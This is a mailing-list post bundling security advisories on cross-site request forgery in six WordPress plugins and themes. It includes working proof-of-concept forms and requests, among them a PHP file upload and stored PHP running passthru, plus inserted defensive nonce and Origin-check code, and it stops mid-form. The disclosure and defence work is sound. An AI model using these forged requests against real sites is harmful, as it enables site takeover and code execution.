Date: Wed, 1 Mar 2017 07:17:14 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Request Forgery vulnerabilities affecting various
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Request Forgery in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability exists in the Atahualpa
WordPress theme which allows attackers to trick legitimate users into
performing unintended actions on the Atahualpa theme configuration page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Atahualpa [2] WordPress Theme
version 3.7.24.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

Atahualpa v3.7.24 has its own Theme Options page where administrators
can set various options, including changing the page's appearance or
injecting JavaScript. The save form of this page doesn't include a
CSRF nonce token, which gives an attacker the ability to trick WordPress
administrators into saving settings the attacker controls.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The theme's save configuration settings form doesn't include a WordPress
CSRF nonce and consequently the script servicing the request doesn't
check for one. This allows the form to be submitted with attacker-chosen
values from any origin, as long as the browser sends a valid login cookie.

An attacker therefore lures a legitimate user with an active WordPress
session to an attacker-controlled website, which submits the "Save
Settings" request to the user's WordPress install. Since the request is
made to a domain for which the browser holds cookies, the legitimate
session cookies are attached and the request succeeds.

The theme's configuration panel allows setting a variety of
configuration options, including changes to the website's appearance as
well as appending JavaScript in several areas. Attackers can use this
vulnerability to inject JavaScript into the site and take over a
WordPress website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Install the theme, log in as admin and load the following CSRF PoC in
another tab of the same browser; clicking "Submit" modifies the page
footer.

<html>
	<body>
		<form
action="http://<target>/wp-admin/themes.php?page=atahualpa-options"
method="POST">
			<input type="hidden" name="footer_style"
value="background&#45;color&#58;&#32;&#35;ffffff&#59;&#13;&#10;border&#45;top&#58;&#32;dashed&#32;1px&#32;&#35;cccccc&#59;&#13;&#10;padding&#58;&#32;10000px&#59;&#13;&#10;text&#45;align&#58;&#32;center&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;size&#58;&#32;95&#37;&#59;&#13;&#10;&#47;&#42;bye&#42;&#47;"/>
			<input type="hidden" name="footer_style_links"
value="text&#45;decoration&#58;&#32;none&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;weight&#58;&#32;normal&#59;"/>
			<input type="hidden" name="footer_style_links_hover"
value="text&#45;decoration&#58;&#32;none&#59;&#13;&#10;color&#58;&#32;&#35;777777&#59;&#13;&#10;font&#45;weight&#58;&#32;normal&#59;"/>
			<input type="hidden" name="footer_style_content"
value="Copyright&#32;&amp;copy&#59;&#32;&#37;current&#45;year&#37;&#32;&#37;home&#37;&#32;&#45;&#32;All&#32;Rights&#32;Reserved"/>
			<input type="hidden" name="full_width_footer" value="No"/>
			<input type="hidden" name="sticky_layout_footer" value="No"/>
			<input type="hidden" name="footer_show_queries" value="No"/>
			<input type="hidden" name="save" value=""/>
			<input type="hidden" name="action" value="save"/>
			<input type="hidden" name="category" value="footer&#45;style"/>
			<input type="submit" value="Submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html
[2] https://wordpress.org/themes/atahualpa/
------------------------------------------------------------------------
Cross-Site Request Forgery in File Manager WordPress plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the File
Manager WordPress Plugin. Among others, this issue can be used to upload
arbitrary PHP files to the server.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0029

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the File Manager [2] WordPress
Plugin version 3.0.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The File Manager [2] WordPress Plugin is a file manager for WordPress
which can be used to upload, delete, copy, move, rename, archive and
extract files without the need for FTP. It was discovered that the File
Manager WordPress Plugin is vulnerable to Cross-Site Request Forgery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The upload form used by the plugin has no protection against CSRF
attacks. As a result an attacker can for example upload arbitrary PHP
files to the server.

Please note that the target user needs to be logged in.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The target parameter holds a Base64-encoded destination path. By using
the proof of concept request below a file named info.php is uploaded to
the /wp-content/uploads/file-manager/ directory.

When uploaded, this file can be requested from the outside as follows:
http://<wp-server>/wp-content/uploads/file-manager/info.php

Request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wp-server>
Cookie: ALL_YOUR_WP_COOKIES
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------6427194103423794601262893907

-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="cmd"

upload
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="target"

l1_d3AtY29udGVudC91cGxvYWRzL2ZpbGUtbWFuYWdlcg
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="suffix"

~
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="action"

connector
-----------------------------6427194103423794601262893907
Content-Disposition: form-data; name="upload[]"; filename="info.php"
Content-Type: text/php

<?php
phpinfo();
?>
-----------------------------6427194103423794601262893907--

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_file_manager_wordpress_plugin.html
[2] https://wordpress.org/plugins/file-manager/
------------------------------------------------------------------------
Cross-Site Request Forgery in Global Content Blocks WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Global Content Blocks WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0031

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Global Content Blocks [2]
WordPress Plugin version 2.1.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Global Content Blocks [2] WordPress Plugin lets users create their
own shortcodes to insert reusable code snippets, PHP or HTML including
forms, opt-in boxes, iframes, Adsense code, etc., into pages and posts
as well as widgets and directly into PHP content. Global Content Blocks
is affected by Cross-Site Request Forgery. Amongst others, this issue
can be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists due to the fact that Global Content Blocks does not use
the Cross-Site Request Forgery protection provided by WordPress. Actions
with Global Content Blocks have a predictable format, thus an attacker
can forge a request that can be executed by a logged in Administrator.
In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept will update/overwrite the content block
with id 1. In order to run the attacker's PHP code, a page/blog needs to
be viewed that contains this content block (eg, [contentblock id=1]).

<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=global-content-blocks"
method="POST">
			<input type="hidden" name="gcb_view" value="update" />
			<input type="hidden" name="update_it" value="1" />
			<input type="hidden" name="gcb_name" value="Foo" />
			<input type="hidden" name="gcb_custom_id" value="" />
			<input type="hidden" name="gcb_type" value="php" />
			<input type="hidden" name="gcb_description" value="" />
			<input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
			<input type="hidden" name="gcb_updateshortcode" value="Update" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html
[2] https://wordpress.org/plugins/global-content-blocks/
------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Download Manager Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been found in the
WordPress Download Manager Plugin. By using this vulnerability an
attacker can change confidential settings of the plugin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Download Manager [2]
version 2.8.99.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Download Manager [2] is a files/documents management plugin
and complete e-commerce solution for selling digital products. The
plugin helps you manage, track and control file downloads and sell
digital products from your WordPress site. Password protection and
user-role protection control access to your files, and a price can be
set when you need to sell a digital item. Users can directly download
free items; when an item has a price, the user goes through cart and
checkout. The plugin advertises a simplified checkout flow intended to
remove barriers to completing an order rather than to persuade the
customer to buy.

It was discovered that WordPress Download Manager is vulnerable to
Cross-Site Request Forgery.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Download Manager plugin lacks a CSRF (nonce) token on the request
that saves its settings. Because of this an attacker is able to change
security-relevant settings such as file browser access and the file
browser base directory by luring a logged-in admin to a malicious page
containing the proof of concept below.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below grants file browser access to users with the
Editor role and sets the file browser root to /srv/www/wordpress-default/:
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="task" value="wdm_save_settings"/>
			<input type="hidden" name="action" value="wdm_settings"/>
			<input type="hidden" name="section" value="basic"/>
			<input type="hidden" name="wpdm_permission_msg" value="Access
Denied"/>
			<input type="hidden" name="wpdm_login_msg" value="<a
href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
			<input type="hidden" name="_wpdm_file_browser_root"
value="/srv/www/wordpress-default/"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="editor"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="administrator"/>
			<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
			<input type="hidden" name="__wpdm_download_speed" value="4096"/>
			<input type="hidden" name="__wpdm_download_resume" value="1"/>
			<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
			<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
			<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
			<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
			<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
			<input type="hidden" name="__wpdm_login_url" value=""/>
			<input type="hidden" name="__wpdm_register_url" value=""/>
			<input type="hidden" name="__wpdm_user_dashboard" value=""/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html
[2] https://wordpress.org/plugins/download-manager/
------------------------------------------------------------------------
Gwolle Guestbook mass action vulnerable for Cross-Site Request Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery (CSRF) vulnerability was found in the
Gwolle Guestbook [2] WordPress plugin. This issue can be used by an
attacker to mass approve or disapprove entries. In order to exploit this
issue, the attacker needs to lure a victim with editor or admin
privileges to an attacker-controlled page or trick them into clicking a
malicious link.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Gwolle Guestbook [2] WordPress
Plugin version 1.7.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was fixed in Gwolle Guestbook version 2.1.1. The most
recent version of Gwolle Guestbook can be obtained from the following
location:
https://wordpress.org/plugins/gwolle-gb/ [2]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Gwolle Guestbook for WordPress is a guestbook made in order to provide
an easy and slim way to integrate a guestbook into your WordPress
powered site. Don't use your 'comment' section the wrong way - install
Gwolle Guestbook and have a real guestbook.

A Cross-Site Request Forgery vulnerability was found in Gwolle
Guestbook. This issue can be used by an attacker to mass approve or
disapprove entries. In order to exploit this issue, the attacker needs
to lure a victim with editor or admin privileges to an
attacker-controlled page or trick them into clicking a malicious link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Gwolle Guestbook allows actions to be performed on multiple entries
at once (mass action). Although actions performed on a single entry do
provide protection against Cross-Site Request Forgery (CSRF) by using
wp-nonces, the mass action lacks this protection. Since the entry IDs
are enumerable, an attacker can mass approve or disapprove entries
without knowing anything about the target site's content.
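The protection that every Details section on this page reports as missing (the Atahualpa options form, the File Manager and Download Manager admin-ajax handlers, the Global Content Blocks update form, the Gwolle mass action above and the Popup by Supsystic save request below) is a few lines of plugin code. The following is an example added by the editor, not code from WordPress or from any plugin or theme named in these advisories; the plugin slug sop-example, the option names, the capability and the action strings are invented, and the code assumes it runs as a plugin inside WordPress, where wp_nonce_field(), check_admin_referer(), wp_create_nonce(), wp_localize_script() and check_ajax_referer() are core functions:

```php
<?php
/*
 * Editor's example, not code from any plugin or theme in these advisories.
 * Shows WordPress nonce protection for both request styles on this page.
 * Slug, option names, capability and action strings are invented.
 */

/* Pattern 1: an options form posted back to its own admin page
   (Atahualpa, Global Content Blocks, Gwolle mass action). */

add_action( 'admin_menu', function () {
    add_options_page( 'SoP Example', 'SoP Example', 'manage_options',
        'sop-example', 'sop_example_render_settings_page' );
} );

function sop_example_render_settings_page() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    $footer = get_option( 'sop_example_footer_style', '' );
    echo '<form method="post" action="">';
    // Emits <input type="hidden" name="_wpnonce" value="..."> bound to this action
    // string, the current user and a time window, plus a _wp_http_referer field.
    // A form served from the attacker's origin cannot know this value.
    wp_nonce_field( 'sop_example_save_settings' );
    echo '<textarea name="footer_style">' . esc_textarea( $footer ) . '</textarea>';
    echo '<input type="hidden" name="action" value="save">';
    submit_button( 'Save Settings' );
    echo '</form>';
}

function sop_example_handle_settings_post() {
    if ( 'sop-example' !== ( $_GET['page'] ?? '' ) || 'save' !== ( $_POST['action'] ?? '' ) ) {
        return;
    }
    // Authorization first: a nonce proves where the request came from, not permission.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // Stops with WordPress's nonce error page unless _wpnonce verifies for this
    // action. Every PoC form on this page omits the field, so every one fails here.
    check_admin_referer( 'sop_example_save_settings' );
    $style = wp_strip_all_tags( wp_unslash( $_POST['footer_style'] ?? '' ) );
    update_option( 'sop_example_footer_style', $style );
}
add_action( 'admin_init', 'sop_example_handle_settings_post' );

/* Pattern 2: a handler behind wp-admin/admin-ajax.php
   (File Manager, Download Manager, Popup by Supsystic). */

function sop_example_enqueue_admin_js( $hook ) {
    if ( 'settings_page_sop-example' !== $hook ) {
        return;
    }
    wp_enqueue_script( 'sop-example', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    // Hands the nonce to the page's own JavaScript as window.sopExample.nonce; the
    // script posts it back as the "nonce" field together with action=sop_example_save.
    wp_localize_script( 'sop-example', 'sopExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'sop_example_ajax' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'sop_example_enqueue_admin_js' );

function sop_example_ajax_save() {
    // Rejects the request (body -1, HTTP 403) unless $_REQUEST['nonce'] verifies
    // for this action. The File Manager and Download Manager PoCs send no nonce.
    check_ajax_referer( 'sop_example_ajax', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $root = sanitize_text_field( wp_unslash( $_POST['browser_root'] ?? '' ) );
    update_option( 'sop_example_browser_root', $root );
    wp_send_json_success();
}
// Registered for logged-in users only: no wp_ajax_nopriv_ hook for a privileged action.
add_action( 'wp_ajax_sop_example_save', 'sop_example_ajax_save' );
```

A WordPress nonce is a keyed hash over the action string, the user ID, the user's session token and a 12-hour tick (the current and the previous tick are accepted), so it is bound to the logged-in user and cannot be precomputed by a third-party page. It is not an authorization check: keep the current_user_can() test beside it, as above, or a low-privileged user who can obtain a nonce for the action will still get through.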

------------------------------------------------------------------------
Proof of Concept
------------------------------------------------------------------------
The following proof of concept code demonstrates this issue:
<html>
	<body>
		<form
action="http://<target>/wordpress/wp-admin/admin.php?page=gwolle-gb%2Fentries.php"
method="POST">
			<input type="hidden" name="gwolle&#95;gb&#95;page" value="entries" />
			<input type="hidden" name="pageNum" value="1" />
			<input type="hidden" name="entriesOnThisPage" value="2" />
			<input type="hidden" name="show" value="all" />
			<input type="hidden" name="massEditAction1" value="check" />
			<input type="hidden" name="doaction" value="Apply" />
			<input type="hidden" name="check&#45;2" value="on" />
			<input type="hidden" name="check&#45;1" value="on" />
			<input type="hidden" name="massEditAction2" value="&#45;1" />
			<input type="hidden" name="" value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/gwolle_guestbook_mass_action_vulnerable_for_cross_site_request_forgery.html
[2] https://wordpress.org/plugins/gwolle-gb/
------------------------------------------------------------------------
Popup by Supsystic WordPress plugin vulnerable to Cross-Site Request
Forgery
------------------------------------------------------------------------
Radjnies Bhansingh, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability exists in the Popup by
Supsystic WordPress Plugin. This vulnerability allows attackers to add
and modify scripting code that will target authenticated WordPress
admins or visitors that see the popup generated by this plugin. For
exploitation of this issue to succeed, and scripting code therefore to
be injected, a victim WordPress admin must click a specially crafted
link or visit a malicious attacker-controlled web page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0013

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Popup by Supsystic [2]
WordPress plugin version 1.7.6.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.
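While no fix is available for this or the other unpatched plugins and theme above, a site owner can mitigate all six issues at once without touching plugin code, because every proof of concept on this page is a cross-site POST: a browser that sends an Origin or Referer header names the attacker's site as the source. The following must-use plugin is an example added by the editor, not code from WordPress or from any plugin mentioned here; it assumes it is dropped into wp-content/mu-plugins/ and the function names are invented:

```php
<?php
/*
 * Editor's example, not code from WordPress or from any plugin or theme in these
 * advisories: a must-use plugin that rejects cross-site POSTs to wp-admin,
 * including admin-ajax.php. Function names are invented.
 */

/**
 * Decide whether a state-changing request plausibly came from one of our own
 * pages. Kept free of WordPress calls so it can be exercised in isolation:
 * $headers carries 'origin' and/or 'referer' (lower-case keys) as the browser
 * sent them; $trusted_hosts lists the host names our pages are served from.
 */
function sop_request_source_is_trusted( array $headers, array $trusted_hosts ): bool {
    // Origin is the authoritative header for cross-site POSTs; fall back to Referer
    // for browsers that omit Origin on same-site form posts.
    $source = $headers['origin'] ?? $headers['referer'] ?? null;
    if ( $source === null ) {
        // Neither header: stripped by a privacy extension, or a scripted client such
        // as the Burp request in the File Manager advisory. Fail closed.
        return false;
    }
    // A sandboxed iframe or a cross-origin redirect yields the literal "null" Origin;
    // parse_url() finds no host in it, so it is rejected here as well.
    $host = parse_url( $source, PHP_URL_HOST );
    if ( ! is_string( $host ) ) {
        return false;
    }
    foreach ( $trusted_hosts as $trusted ) {
        if ( strcasecmp( $host, $trusted ) === 0 ) {
            return true;
        }
    }
    return false;
}

function sop_block_cross_site_admin_posts() {
    if ( 'POST' !== ( $_SERVER['REQUEST_METHOD'] ?? 'GET' ) ) {
        return;
    }
    $headers = array();
    if ( isset( $_SERVER['HTTP_ORIGIN'] ) ) {
        $headers['origin'] = $_SERVER['HTTP_ORIGIN'];
    }
    if ( isset( $_SERVER['HTTP_REFERER'] ) ) {
        $headers['referer'] = $_SERVER['HTTP_REFERER'];
    }
    // home_url() and site_url() can differ when WordPress lives in its own directory.
    $trusted = array_unique( array_filter( array(
        parse_url( home_url(), PHP_URL_HOST ),
        parse_url( site_url(), PHP_URL_HOST ),
    ) ) );
    if ( ! sop_request_source_is_trusted( $headers, $trusted ) ) {
        wp_die( 'Cross-site request rejected.', 'Forbidden', array( 'response' => 403 ) );
    }
}
// admin_init fires for wp-admin/*.php and for admin-ajax.php, which covers the
// endpoints of all six proofs of concept; front-end POST handlers are not covered.
add_action( 'admin_init', 'sop_block_cross_site_admin_posts' );
```

This is defence in depth, not a replacement for nonces: it rejects any POST that arrives with neither header, including legitimate scripted clients and browsers behind Referer-stripping extensions, so test it against your own admin workflows before deploying. A forged form submitted from an attacker's page carries that page's origin and is refused, whereas the same request issued from a page WordPress itself served passes. Plugins that accept the same state-changing requests outside wp-admin are not protected by this hook.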

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The aim of the Popup by Supsystic [2] WordPress plugin is to help you
get more newsletter subscribers, promote new products, deliver special
offers and to get more social followers.

A Cross-Site Request Forgery vulnerability exists in the Popup by
Supsystic WordPress Plugin. This vulnerability allows attackers to add
and modify scripting code that will target authenticated admins or
visitors that see the popup generated by this plugin. In order to
exploit this issue the target user must click a specially crafted link
or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because Popup by Supsystic lacks protection against
Cross-Site Request Forgery attacks. The following proof of concept code
demonstrates this issue:

<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="params[main][show_on]" value="page_load"
/>
			<input type="hidden" name="params[main][show_on_page_load_delay]"
value="" />
			<input type="hidden" name="ppsCopyTextCode"
value="[supsystic-show-popup id=100]" />
			<input type="hidden" name="ppsCopyTextCode"
value="onclick=&quot;ppsShowPopup(100); return false;&quot;" />
			<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100"
/>
			<input type="hidden" name="params[main][show_on_click_on_el_delay]"
value="0" />
			<input type="hidden" name="params[main][show_on_scroll_window_delay]"
value="0" />
			<input type="hidden"
name="params[main][show_on_scroll_window_perc_scroll]" value="0" />
			<input type="hidden" name="ppsCopyTextCode" value="#ppsShowPopUp_100"
/>
			<input type="hidden" name="params[main][show_on_link_follow_delay]"
value="0" />
			<input type="hidden" name="ppsCopyTextCode"
value="[supsystic-popup-content id=100]" />
			<input type="hidden" name="params[main][close_on]" value="user_close"
/>
			<input type="hidden" name="params[main][show_pages]" value="all" />
			<input type="hidden" name="params[main][show_time_from]"
value="12:00am" />
			<input type="hidden" name="params[main][show_time_to]"
value="12:00am" />
			<input type="hidden" name="params[main][show_date_from]" value="" />
			<input type="hidden" name="params[main][show_date_to]" value="" />
			<input type="hidden" name="params[main][show_to]" value="everyone" />
			<input type="hidden"
name="params[main][show_to_first_time_visit_days]" value="30" />
			<input type="hidden"
name="params[main][show_to_until_make_action_days]" value="30" />
			<input type="hidden" name="params[main][count_times_num]" value="1"
/>
			<input type="hidden" name="params[main][count_times_mes]" value="day"
/>
			<input type="hidden" name="params[main][hide_for_devices_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_post_types_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_ips_show]" value="0"
/>
			<input type="hidden" name="params[main][hide_for_ips]" value="" />
			<input type="hidden" name="params[main][hide_for_countries_show]"
value="0" />
			<input type="hidden" name="params[main][hide_for_languages_show]"
value="0" />
			<input type="hidden" name="params[main][hide_search_engines_show]"
value="0" />
			<input type="hidden" name="params[main][hide_preg_url_show]"
value="0" />
			<input type="hidden" name="params[main][hide_preg_url]" value="" />
			<input type="hidden" name="params[main][hide_for_user_roles_show]"
value="0" />
			<input type="hidden" name="params[tpl][width]" value="400" />
			<input type="hidden" name="params[tpl][width_measure]" value="px" />
			<input type="hidden" name="params[tpl][bg_overlay_opacity]"
value="0.5" />
			<input type="hidden" name="params[tpl][bg_type_0]" value="color" />
			<input type="hidden" name="params[tpl][bg_img_0]" value="" />
			<input type="hidden" name="params[tpl][bg_color_0]" value="#8c7764"
/>
			<input type="hidden" name="params[tpl][bg_type_1]" value="color" />
			<input type="hidden" name="params[tpl][bg_img_1]" value="" />
			<input type="hidden" name="params[tpl][bg_color_1]" value="#75362c"
/>
			<input type="hidden" name="params[tpl][font_label]" value="default"
/>
			<input type="hidden" name="params[tpl][label_font_color]"
value="#ffffff" />
			<input type="hidden" name="params[tpl][font_txt_0]" value="default"
/>
			<input type="hidden" name="params[tpl][text_font_color_0]"
value="#f9e6ce" />
			<input type="hidden" name="params[tpl][font_footer]" value="default"
/>
			<input type="hidden" name="params[tpl][footer_font_color]"
value="#585858" />
			<input type="hidden" name="params[tpl][responsive_mode]" value="def"
/>
			<input type="hidden" name="params[tpl][reidrect_on_close]" value=""
/>
			<input type="hidden" name="params[tpl][close_btn]"
value="while_close" />
			<input type="hidden" name="params[tpl][bullets]" value="lists_green"
/>
			<input type="hidden" name="layered_style_promo" value="1" />
			<input type="hidden" name="params[tpl][layered_pos]" value="" />
			<input type="hidden" name="params[tpl][enb_label]" value="1" />
			<input type="hidden" name="params[tpl][label]" value="SIGN UP<br> to
our Newsletter!" />
			<input type="hidden" name="params[tpl][enb_txt_0]" value="1" />
			<input type="hidden" name="params_tpl_txt_0" value="<p>Popup by
Supsystic lets you easily create elegant overlapping windows with
unlimited features. Pop-ups with Slider, Lightbox, Contact and
Subscription forms and more</p>" />
			<input type="hidden" name="params[tpl][foot_note]" value="We respect
your privacy. Your information will not be shared with any third party
and you can unsubscribe at any time " />
			<input type="hidden" name="params[tpl][enb_sm_facebook]" value="1" />
			<input type="hidden" name="params[tpl][enb_sm_googleplus]" value="1"
/>
			<input type="hidden" name="params[tpl][enb_sm_twitter]" value="1" />
			<input type="hidden" name="params[tpl][sm_design]" value="boxy" />
			<input type="hidden" name="params[tpl][anim_key]" value="none" />
			<input type="hidden" name="params[tpl][anim_duration]" value="" />
			<input type="hidden" name="params[tpl][enb_subscribe]" value="1" />
			<input type="hidden" name="params[tpl][sub_dest]" value="wordpress"
/>
			<input type="hidden" name="params[tpl][sub_wp_create_user_role]"
value="subscriber" />
			<input type="hidden" name="params[tpl][sub_aweber_listname]" value=""
/>
			<input type="hidden" name="params[tpl][sub_aweber_adtracking]"
value="" />
			<input type="hidden" name="params[tpl][sub_mailchimp_api_key]"
value="" />
			<input type="hidden" name="params[tpl][sub_mailchimp_groups_full]"
value="" />
			<input type="hidden" name="test_email"
value="canzihazcandy@...il.com" />
			<input type="hidden" name="params[tpl][sub_fields][name][enb]"
value="1" />
			<input type="hidden" name="params[tpl][sub_fields][name][name]"
value="name" />
			<input type="hidden" name="params[tpl][sub_fields][name][html]"
value="text" />
			<input type="hidden" name="params[tpl][sub_fields][name][label]"
value="Name" />
			<input type="hidden" name="params[tpl][sub_fields][name][value]"
value="" />
			<input type="hidden" name="params[tpl][sub_fields][name][custom]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][name][mandatory]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][email][name]"
value="email" />
			<input type="hidden" name="params[tpl][sub_fields][email][html]"
value="text" />
			<input type="hidden" name="params[tpl][sub_fields][email][label]"
value="E-Mail" />
			<input type="hidden" name="params[tpl][sub_fields][email][value]"
value="" />
			<input type="hidden" name="params[tpl][sub_fields][email][custom]"
value="0" />
			<input type="hidden" name="params[tpl][sub_fields][email][mandatory]"
value="1" />
			<input type="hidden" name="params[tpl][sub_fields][email][enb]"
value="1" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_sent]"
value="Confirmation link was sent to your email address. Check your
email!" />
			<input type="hidden" name="params[tpl][sub_txt_success]" value="Thank
you for subscribe!" />
			<input type="hidden" name="params[tpl][sub_txt_invalid_email]"
value="Empty or invalid email" />
			<input type="hidden" name="params[tpl][sub_txt_exists_email]"
value="Empty or invalid email" />
			<input type="hidden" name="params[tpl][sub_redirect_url]" value="" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_subject]"
value="Confirm subscription on [sitename]" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_from]"
value="admin@...l.com" />
			<input type="hidden" name="params[tpl][sub_txt_confirm_mail_message]"
value="You subscribed on site <a
href=&quot;[siteurl]&quot;>[sitename]</a>. Follow <a
href=&quot;[confirm_link]&quot;>this link</a> to complete your
subscription. If you did not subscribe here - just ignore this message."
/>
			<input type="hidden"
name="params[tpl][sub_txt_subscriber_mail_subject]" value="[sitename]
Your username and password" />
			<input type="hidden" name="params[tpl][sub_txt_subscriber_mail_from]"
value="admin@...l.com" />
			<input type="hidden"
name="params[tpl][sub_txt_subscriber_mail_message]" value="Username:
[user_login]<br />Password: [password]<br />[login_url]" />
			<input type="hidden" name="params[tpl][sub_redirect_email_exists]"
value="" />
			<input type="hidden" name="params[tpl][sub_btn_label]" value="SIGN
UP" />
			<input type="hidden" name="params[tpl][sub_new_email]"
